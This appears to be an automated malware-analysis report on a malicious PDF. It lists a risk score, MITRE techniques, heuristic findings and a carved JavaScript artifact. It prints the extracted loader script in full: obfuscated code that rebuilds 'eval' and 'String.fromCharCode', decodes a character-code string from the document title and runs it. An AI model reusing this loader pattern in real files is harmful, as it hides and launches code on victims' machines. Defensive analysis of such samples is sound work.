MALICIOUS
86
Risk Score
Malware Insights
MITRE ATT&CK
T1059.007 JavaScript
T1566.001 Spearphishing Attachment
The PDF document contains obfuscated JavaScript, identified by the 'PDF_PIDIEF_OBFUSCATED_VERSION_GATED_LOADER' heuristic. This script is designed to decode and execute a secondary payload. The script reconstructs the string 'eval(cfw)' and then executes it, which likely leads to the download and execution of further malicious content. The ML classifier strongly indicates maliciousness.
Machine Learning
- Nyx PDF Classifier malicious score 1.0000
Heuristics 3
-
Obfuscated Pidief-style JavaScript loader (stage not decoded) high PDF_PIDIEF_OBFUSCATED_VERSION_GATED_LOADERPDF JavaScript carries a large opaque encoded stage (a letter-delimited numeric character-code array) that is built to be decoded and eval'd, but no exact Adobe Reader CVE could be attributed because the encoding scheme resisted full static decoding. This is the structural fingerprint of the Pidief / multi-CVE exploit-kit loader family — a version-gated obfuscated JavaScript stage with no benign use. Flagged suspicious on its own; an ML/AV signal or a recovered heap-spray pushes it to malicious.
-
JavaScript action low 1 related finding PDF_JAVASCRIPTPDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
-
Embedded JS stream low PDF_JSPDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
javascript_obj0001_000.js |
pdf-javascript-stream | PDF /JS object 1 at offset 0xAF30 | 474 bytes |
SHA-256: 71ee9f8188ecebd8fd7247fe02ad48f7fd2c3f0dbb08cdbb494f2854db6ec97d |
|||
Preview scriptFirst 1,000 lines of the extracted script
cfw='';
v='s'+'u';
try{try{qwe()}catch(a){gsdg()}}catch(e){v+='b'+'st';qqq='split';}
qwe = ('webweb',v)[v+'r'];
t='le';
b='v';
a=["e","a","n","b","w",b,'r'];
s=a[0]+b+a[1]+'l';
e=(t,qwe)()[s];
fsx=e('ti'+'tle');
s=fsx.substr(t.length + 8,3)+'str';
q=fsx[s](1,(1,t.length + 7));
lho=e('S'+'tring.fro'+q);
q=fsx[s](14)[qqq]('u');
k=q.length;
for (i = 0; i != k; i+=2) {
esq = parseInt(q[i+1]) + parseInt(('erybjkerl',q[i]));
cfw += lho(esq);
}
e(cfw);
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.